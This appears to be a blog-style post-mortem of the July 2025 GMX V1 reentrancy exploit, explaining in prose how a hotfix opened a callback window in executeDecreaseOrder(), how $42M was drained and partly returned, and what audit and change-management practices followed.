GMX V1 Reentrancy Exploit: How a Classic Bug Drained $42M
A detailed breakdown of the July 2025 GMX V1 hack—how a well-known smart contract vulnerability enabled huge losses, and the updated norms for DeFi security audits.
GMX V1 Reentrancy Exploit: New Code, Old Vulnerabilities
Exposing the Reentrancy Sequence
In July 2025, GMX Version 1—the original perpetual DEX—was hit for $42 million by an attacker who leveraged a reentrancy bug in the executeDecreaseOrder() function. This function was meant to process user withdrawals but, due to an upgrade in state-handling logic, allowed a malicious contract to call back into GMX before critical accounting variables (notably the global average short price) were updated. This reentrancy flaw let the attacker manipulate key protocol invariants, moving global price metrics out of sync and claiming artificially profitable redemptions.
The reentrancy was specifically introduced by a previous hotfix in late 2024, which sought to patch a race condition in global position tracking for shorts. The new logic, however, called user contracts before updating key protocol state, which broke the atomicity and opened a reentrancy window. The attacker created a custom contract that recursively triggered executeDecreaseOrder() during the refund process. Each pass left price metrics increasingly inaccurate. By the end, the exploit let them drain $42M, mostly via GLP redemptions at inflated asset-under-management rates. Fortunately, after negotiation, the attacker returned most of the funds in exchange for a $5M whitehat bounty.
Code Legacy and New Audit Culture
The GMX incident reinforced that even “solved” bugs like reentrancy can reappear any time protocol logic is hastily changed—especially in response to urgent issues. GMX’s vulnerability arose not from original design, but from an upgrade implemented post-bug bounty. The incident highlighted the need for exhaustive, post-patch security reviews and regression tests on all upgraded contract paths.
After the exploit, GMX replaced all external call logic with push-only internal accounting, enforced complete state updates before user callbacks, and mandated a third-party audit on every codebase change. Formal verification is now required after material upgrades, not just initial deployments. For the broader DeFi sector, the GMX hack echoes a familiar message: every fix creates a new attack surface unless change management gets the same scrutiny as launches. Reentrancy risks aren’t historical—they’re perpetual if composability isn’t managed by design and tested at every turn.
.png&w=3840&q=75)
